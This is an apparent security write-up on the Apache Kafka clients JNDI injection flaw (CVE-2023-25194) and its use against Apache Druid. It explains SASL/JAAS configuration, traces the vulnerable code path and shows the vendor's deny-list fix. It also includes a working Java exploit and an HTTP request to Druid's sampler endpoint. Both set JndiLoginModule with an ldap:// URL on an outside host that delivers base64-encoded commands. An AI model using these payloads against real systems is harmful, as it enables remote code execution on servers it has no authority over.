Apache Kafka Clients JNDI Injection (CVE-2023-25194)
Vulnerability description
Apache Kafka is a distributed streaming platform that can publish, subscribe to, store, and process data streams in real time. Kafka Connect is a tool for scalable, reliable streaming of data between Kafka and other systems. Any Kafka client that accepts a SASL JAAS configuration is affected: an attacker who can create or modify connectors on a Kafka Connect worker can supply a crafted sasl.jaas.config value that triggers JNDI injection and leads to remote code execution.
Affected versions
2.4.0 <= Apache Kafka <= 3.3.2
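As a quick illustration of the range above, here is a minimal sketch that checks whether a kafka-clients version string falls inside it. The class and method names are hypothetical, and it assumes plain numeric versions such as 3.3.1 (no suffixes like -rc1).

```java
public class KafkaVersionCheck {
    // Parses "major.minor.patch" into three integers; missing parts count as 0.
    public static int[] parse(String version) {
        String[] parts = version.trim().split("\\.");
        int[] out = new int[3];
        for (int i = 0; i < 3 && i < parts.length; i++) {
            out[i] = Integer.parseInt(parts[i]);
        }
        return out;
    }

    // Compares two versions component by component (negative, zero, or positive).
    public static int compare(String a, String b) {
        int[] x = parse(a);
        int[] y = parse(b);
        for (int i = 0; i < 3; i++) {
            if (x[i] != y[i]) {
                return Integer.compare(x[i], y[i]);
            }
        }
        return 0;
    }

    // True when 2.4.0 <= version <= 3.3.2, the range stated in this article.
    public static boolean isAffected(String version) {
        return compare(version, "2.4.0") >= 0 && compare(version, "3.3.2") <= 0;
    }

    public static void main(String[] args) {
        for (String v : new String[] {"2.3.1", "2.4.0", "3.3.1", "3.3.2", "3.4.0"}) {
            System.out.println(v + " affected: " + isAffected(v));
        }
    }
}
```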
Prerequisite knowledge
What is Kafka
Kafka is an open source distributed messaging system. Kafka can handle a large number of messages and data streams and has the characteristics of high throughput, low latency, and scalability. It is widely used in big data fields, such as log collection, data transmission, stream processing and other scenarios.
It is very similar to RocketMQ; both are mainly used to transport data.
Kafka client SASL JAAS configuration
Simple Authentication and Security Layer (SASL) is a framework for authentication and data security in network protocols. In Kafka, SASL is configured through JAAS.
Java Authentication and Authorization Service (JAAS) is Java's user-centric security framework, complementing Java's code-centric security. In short, it handles authentication. Interestingly, Shiro (JSecurity) was originally developed because of the many shortcomings JAAS had at the time.
The following is referenced from https://blog.csdn.net/yinxuep/article/details/103242969. Some finer configuration details are not covered here. Setting the configuration dynamically has the same effect as statically editing the .conf file.
Server configuration
1. The server JAAS file is usually placed on each broker node. Here it is named kafka_server_jaas.conf, with the following content:
KafkaServer {
    org.apache.kafka.common.security.plain.PlainLoginModule required
    username="eystar"
    password="eystar8888"
    user_eystar="eystar8888"
    user_yxp="yxp-secret";
};
Description:
username and password are the credentials used for communication between brokers in the Kafka cluster.
user_eystar="eystar8888" defines a user that clients can use to connect to the broker: it creates an identity with the user name eystar and the password eystar8888, which the Kafka broker authenticates. Define multiple users with entries of the form user_XXX="XXX".
2. For static use, the file must be added to the JVM startup parameters, as follows:
if [ "x$KAFKA_OPTS" = "x" ]; then
    export KAFKA_OPTS="-Djava.security.auth.login.config=/opt/modules/kafka_2.11-2.0.0/config/kafka_server_jaas.conf"
fi
https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config
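To see how such a file is interpreted, the sketch below parses the server JAAS text with the JDK's standard JavaLoginConfig parser and collects the user_XXX entries. It uses only the JDK, not Kafka itself; the class and method names are hypothetical, and the temporary file is just a convenience for feeding text to the parser.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.NoSuchAlgorithmException;
import java.security.URIParameter;
import java.util.Map;
import java.util.TreeMap;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.Configuration;

public class JaasFileInspector {
    // Parses JAAS text with the JDK parser and returns the options of the
    // first login module in the given section (for example "KafkaServer").
    public static Map<String, ?> optionsOf(String jaasText, String section) {
        Path file = null;
        try {
            file = Files.createTempFile("jaas", ".conf");
            Files.write(file, jaasText.getBytes(StandardCharsets.UTF_8));
            Configuration config = Configuration.getInstance(
                    "JavaLoginConfig", new URIParameter(file.toUri()));
            AppConfigurationEntry[] entries = config.getAppConfigurationEntry(section);
            if (entries == null || entries.length == 0) {
                throw new IllegalArgumentException("No JAAS section named " + section);
            }
            return entries[0].getOptions();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        } finally {
            if (file != null) {
                file.toFile().delete();
            }
        }
    }

    // Collects user_XXX="password" options into a user name -> password map.
    public static Map<String, String> clientUsers(Map<String, ?> options) {
        Map<String, String> users = new TreeMap<>();
        for (Map.Entry<String, ?> e : options.entrySet()) {
            if (e.getKey().startsWith("user_")) {
                users.put(e.getKey().substring("user_".length()), String.valueOf(e.getValue()));
            }
        }
        return users;
    }

    public static void main(String[] args) {
        String jaas = "KafkaServer {\n"
                + "  org.apache.kafka.common.security.plain.PlainLoginModule required\n"
                + "  username=\"eystar\" password=\"eystar8888\"\n"
                + "  user_eystar=\"eystar8888\" user_yxp=\"yxp-secret\";\n"
                + "};\n";
        Map<String, ?> options = optionsOf(jaas, "KafkaServer");
        System.out.println("inter-broker user: " + options.get("username"));
        System.out.println("client users: " + clientUsers(options).keySet());
    }
}
```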
Client configuration
The client is configured in much the same way as the server. The steps are as follows:
1. Configure the client JAAS file and name it kafka_client_jaas.conf
KafkaClient {
    org.apache.kafka.common.security.plain.PlainLoginModule required
    username="eystar"
    password="eystar8888";
};
2. Specify the sasl.jaas.config configuration property when connecting with the Kafka client from Java:
sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
    username="eystar" \
    password="eystar8888";
// The same property can also be set in code. As discussed later, it can be configured dynamically, which is reminiscent of RocketMQ.
props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"eystar\" password=\"eystar8888\";");
Kafka client dynamically modifies JAAS configuration
Method 1: Configure it through Properties. Note that the key for this field is sasl.jaas.config, and its value has the following format:
loginModuleClass controlFlag (optionName=optionValue)*;
loginModuleClass selects the authentication method, such as LDAP, Kerberos, or Unix authentication. See the official documentation at https://docs.oracle.com/javase/8/docs/technotes/guides/security/jgss/tutorials/LoginConfigFile.html. One of the available modules is JndiLoginModule; the JDK's built-in login modules are located in the com.sun.security.auth.module package.
// Security mode: user name and password
props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
props.setProperty("security.protocol", "SASL_PLAINTEXT");
props.setProperty("sasl.mechanism", "PLAIN");
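The loginModuleClass controlFlag (optionName=optionValue)*; format can be assembled programmatically. The following is a minimal sketch with a hypothetical helper class; it assumes option values are double-quoted and that backslashes and double quotes inside a value should be backslash-escaped.

```java
import java.util.LinkedHashMap;
import java.util.Map;

public class JaasConfigBuilder {
    // Escapes backslashes and double quotes so the value can sit inside "...".
    static String escape(String value) {
        return value.replace("\\", "\\\\").replace("\"", "\\\"");
    }

    // Builds: loginModuleClass controlFlag optionName="optionValue" ... ;
    public static String build(String loginModuleClass, String controlFlag,
                               Map<String, String> options) {
        StringBuilder sb = new StringBuilder(loginModuleClass).append(' ').append(controlFlag);
        for (Map.Entry<String, String> option : options.entrySet()) {
            sb.append(' ')
              .append(option.getKey())
              .append("=\"")
              .append(escape(option.getValue()))
              .append('"');
        }
        return sb.append(';').toString();
    }

    public static void main(String[] args) {
        Map<String, String> options = new LinkedHashMap<>();
        options.put("username", "usn");
        options.put("password", "pwd");
        System.out.println(build(
                "org.apache.kafka.common.security.plain.PlainLoginModule", "required", options));
    }
}
```

The resulting string is what would be passed as the value of sasl.jaas.config. Because the whole value, including the module class, is an ordinary string, anyone who controls it also controls which login module gets loaded.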
Method 2: Set a system property
// Specify the path of the kafka_client_jaas.conf file
String confPath = TestKafkaComsumer.class.getResource("/").getPath() + "/kafka_client_jaas.conf";
System.setProperty("java.security.auth.login.config", confPath);
Implementation code
Consumer
import java.time.Duration;
import java.util.Arrays;
import java.util.Properties;
import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.apache.kafka.clients.consumer.ConsumerRecords;
import org.apache.kafka.clients.consumer.KafkaConsumer;

public class TestComsumer {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("group.id", "test_group");
        props.put("enable.auto.commit", "true");
        props.put("auto.commit.interval.ms", "1000");
        props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        // Configuration of sasl.jaas.config
        props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");
        KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
        consumer.subscribe(Arrays.asList("topic_name"));
        // Poll forever and print every record received
        while (true) {
            try {
                ConsumerRecords<String, String> records = consumer.poll(Duration.ofMillis(100));
                for (ConsumerRecord<String, String> record : records) {
                    System.out.printf("offset = %d, partition = %d, key = %s, value = %s%n",
                            record.offset(), record.partition(), record.key(), record.value());
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
}
Producer
import java.util.Properties;
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;

public class TestProduce {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("acks", "1");
        props.put("retries", 3);
        props.put("batch.size", 16384);
        props.put("buffer.memory", 33554432);
        props.put("linger.ms", 10);
        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        // SASL
        props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");
        Producer<String, String> producer = new KafkaProducer<>(props);
        /*
         * ProducerRecord parameters:
         * First: topic_name is the topic the producer writes to.
         * Second: the key. With the Kafka 2.0 producer a key needs to be specified; in enterprise
         *         applications it is generally a business ID such as an order ID or user ID.
         * Third: the message body.
         */
        try {
            // The original snippet used an undefined variable i; a short loop is assumed here
            for (int i = 0; i < 10; i++) {
                producer.send(new ProducerRecord<String, String>("topic_name", Integer.toString(i), "message info"));
            }
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            // Flush pending records and release resources
            producer.close();
        }
    }
}
Vulnerability Reproduction
The vulnerability is actually triggered in the com.sun.security.auth.module.JndiLoginModule#attemptAuthentication method.
Once the logic is clear, the exploit is easy to construct:
import org.apache.kafka.clients.consumer.KafkaConsumer;
import java.util.Properties;

public class EXP {
    public static void main(String[] args) throws Exception {
        Properties properties = new Properties();
        properties.put("bootstrap.servers", "127.0.0.1:1234");
        properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        properties.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        properties.put("sasl.mechanism", "PLAIN");
        properties.put("security.protocol", "SASL_SSL");
        properties.put("sasl.jaas.config",
                "com.sun.security.auth.module.JndiLoginModule " +
                "required " +
                "user.provider.url=\"ldap://124.222.21.138:1389/Basic/Command/Base64/Q2FsYw==\" " +
                "useFirstPass=\"true\" " +
                "group.provider.url=\"xxx\";");
        KafkaConsumer<String, String> kafkaConsumer = new KafkaConsumer<>(properties);
        kafkaConsumer.close();
    }
}
Vulnerability Analysis
Much of the early code only processes and assigns data, so skip it and go straight to line 177 of the org.apache.kafka.clients.consumer.KafkaConsumer class, which calls ClientUtils.createChannelBuilder(). Step into it.
Continue stepping in. The code first checks whether SASL is enabled; only if it is does execution reach the create() method.
Step into create(). After checking the client type and the security protocol, it calls loadClientContext(). Stepping into that method shows that it only loads more configuration.
Step back out and follow ((ChannelBuilder)channelBuilder).configure(configs), which eventually reaches the constructor of org.apache.kafka.common.security.authenticator.LoginManager.
Step into login(). It creates a new LoginContext() and then calls its login() method. Step in again.
Here the initialize() method of JndiLoginModule is called.
After initialization completes, the login() method of JndiLoginModule is called, which finally calls the attemptAuthentication() method of JndiLoginModule and completes the JNDI injection.
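The last steps of this chain are standard JAAS behavior and can be observed with the JDK alone. The sketch below is an illustration under stated assumptions: RecordingModule is a hypothetical, harmless stand-in for JndiLoginModule that only records which methods LoginContext calls and performs no JNDI lookup, and the section name and URL are placeholders.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import javax.security.auth.Subject;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.AppConfigurationEntry.LoginModuleControlFlag;
import javax.security.auth.login.Configuration;
import javax.security.auth.login.LoginContext;
import javax.security.auth.login.LoginException;
import javax.security.auth.spi.LoginModule;

public class JaasCallOrderDemo {
    // Records the order in which LoginContext invokes the module's methods.
    public static final List<String> CALLS = new ArrayList<>();

    // Hypothetical stand-in for JndiLoginModule: records calls, never touches JNDI.
    public static class RecordingModule implements LoginModule {
        public RecordingModule() {}

        @Override
        public void initialize(Subject subject, CallbackHandler handler,
                               Map<String, ?> sharedState, Map<String, ?> options) {
            // The options come straight from the configuration entry.
            CALLS.add("initialize user.provider.url=" + options.get("user.provider.url"));
        }

        @Override
        public boolean login() {
            // JndiLoginModule would attempt authentication against the configured URL here.
            CALLS.add("login");
            return true;
        }

        @Override public boolean commit() { CALLS.add("commit"); return true; }
        @Override public boolean abort() { return true; }
        @Override public boolean logout() { return true; }
    }

    public static List<String> run(String providerUrl) {
        CALLS.clear();
        Map<String, String> options = Collections.singletonMap("user.provider.url", providerUrl);
        AppConfigurationEntry entry = new AppConfigurationEntry(
                RecordingModule.class.getName(), LoginModuleControlFlag.REQUIRED, options);
        Configuration config = new Configuration() {
            @Override
            public AppConfigurationEntry[] getAppConfigurationEntry(String name) {
                return new AppConfigurationEntry[] {entry};
            }
        };
        Thread thread = Thread.currentThread();
        ClassLoader previous = thread.getContextClassLoader();
        try {
            // LoginContext resolves the module class by name through the context class loader.
            thread.setContextClassLoader(JaasCallOrderDemo.class.getClassLoader());
            new LoginContext("KafkaClient", null, null, config).login();
        } catch (LoginException e) {
            throw new IllegalStateException(e);
        } finally {
            thread.setContextClassLoader(previous);
        }
        return new ArrayList<>(CALLS);
    }

    public static void main(String[] args) {
        run("ldap://example.invalid/placeholder").forEach(System.out::println);
    }
}
```

The point of the sketch is that the module class name and its options are both taken from configuration, so a configuration string naming JndiLoginModule is enough to have its initialize() and login() methods run with attacker-chosen options.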
Bug fix
In version 3.4.0, the official fix adds a deny list that blocks JndiLoginModule by default. The check is implemented in org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed:
private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {
    // Comma-separated deny list; defaults to JndiLoginModule when the system property is not set
    Set<String> disallowedLoginModuleList = Arrays.stream(
            System.getProperty("org.apache.kafka.disallowed.login.modules",
                    "com.sun.security.auth.module.JndiLoginModule").split(","))
            .map(String::trim)
            .collect(Collectors.toSet());
    String loginModuleName = appConfigurationEntry.getLoginModuleName().trim();
    if (disallowedLoginModuleList.contains(loginModuleName)) {
        throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '"
                + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName);
    }
}
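The behavior of this check can be tried without a Kafka dependency. The following is a standalone sketch that mirrors the logic above using only the JDK; the class and method names are hypothetical, and only the system property name and its default value are taken from the fix.

```java
import java.util.Arrays;
import java.util.Set;
import java.util.stream.Collectors;

public class LoginModuleDenyList {
    static final String PROPERTY = "org.apache.kafka.disallowed.login.modules";
    static final String DEFAULT = "com.sun.security.auth.module.JndiLoginModule";

    // Reads the comma-separated deny list, falling back to JndiLoginModule.
    public static Set<String> disallowed() {
        return Arrays.stream(System.getProperty(PROPERTY, DEFAULT).split(","))
                .map(String::trim)
                .collect(Collectors.toSet());
    }

    // True when the given login module class name is not on the deny list.
    public static boolean isAllowed(String loginModuleName) {
        return !disallowed().contains(loginModuleName.trim());
    }

    public static void main(String[] args) {
        System.out.println(isAllowed("com.sun.security.auth.module.JndiLoginModule"));
        System.out.println(isAllowed("org.apache.kafka.common.security.plain.PlainLoginModule"));
    }
}
```

Note that the list is controlled by a system property, so setting the property to a value that omits JndiLoginModule re-enables it. The default protects only deployments that leave the property unset or keep JndiLoginModule in it.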
Apache Druid RCE via Kafka Clients
Affected versions: Apache Druid <= 25.0.0
Apache Druid is a real-time analytical database that supports ingesting data from Kafka (acting as a consumer). Apache Druid 25.0.0, the latest version at the time of writing, still depends on kafka-clients 3.3.1, which is a vulnerable version. If the target Druid instance allows unauthenticated access (the default configuration has no authentication), RCE can be achieved this way.
Interestingly, Druid includes the commons-beanutils:1.9.4 dependency, so even on a newer JDK a deserialization payload can be delivered through LDAP JNDI to achieve RCE.
- Trigger point in the UI: Druid Web Console – Load data – Apache Kafka
Kafka data can be loaded here, and the sasl.jaas.config configuration item can be modified to construct the payload:
POST http://124.222.21.138:8888/druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 124.222.21.138:8888
Content-Length: 916
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43
Content-Type: application/json
Origin: http://124.222.21.138:8888
Referer: http://124.222.21.138:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4,no;q=0.3,ko;q=0.2
Connection: close

{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{
"bootstrap.servers":"127.0.0.1:1234",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},"topic":"123","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},
"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},
"tuningConfig":{"type":"kafka"}},
"samplerConfig":{"numRows":500,"timeoutMs":15000}}
The extension druid-kafka-indexing-service shows how the KafkaConsumer is instantiated. The call to addConsumerPropertiesFromConfig() on line 286 applies the supplied configuration dynamically.
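Because the consumer properties come from the request, a service in this position could inspect them before creating a client. The sketch below is a hypothetical pre-check, not Druid's or Kafka's actual code: it treats the first whitespace-delimited token of sasl.jaas.config as the login module class and rejects JndiLoginModule. It assumes a single login module entry in the value.

```java
import java.util.HashMap;
import java.util.Map;

public class ConsumerPropertiesGuard {
    static final String BLOCKED_MODULE = "com.sun.security.auth.module.JndiLoginModule";

    // Returns the login module class named in sasl.jaas.config, or null if absent.
    public static String loginModuleOf(Map<String, ?> consumerProperties) {
        Object value = consumerProperties.get("sasl.jaas.config");
        if (value == null) {
            return null;
        }
        String text = value.toString().trim();
        if (text.isEmpty()) {
            return null;
        }
        // The format is: loginModuleClass controlFlag (optionName=optionValue)*;
        return text.split("\\s+")[0];
    }

    // Throws if the user-supplied properties name the blocked login module.
    public static void check(Map<String, ?> consumerProperties) {
        String module = loginModuleOf(consumerProperties);
        if (BLOCKED_MODULE.equals(module)) {
            throw new IllegalArgumentException(module + " is not allowed in sasl.jaas.config");
        }
    }

    public static void main(String[] args) {
        Map<String, Object> props = new HashMap<>();
        props.put("bootstrap.servers", "127.0.0.1:1234");
        props.put("sasl.jaas.config",
                "com.sun.security.auth.module.JndiLoginModule required useFirstPass=\"true\";");
        try {
            check(props);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A check like this is only a stopgap; upgrading kafka-clients to a fixed version is the actual remedy.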
Apache Druid 26.0.0 updates the version of the Kafka dependency:
https://github.com/apache/druid/blob/26.0.0/pom.xml#L79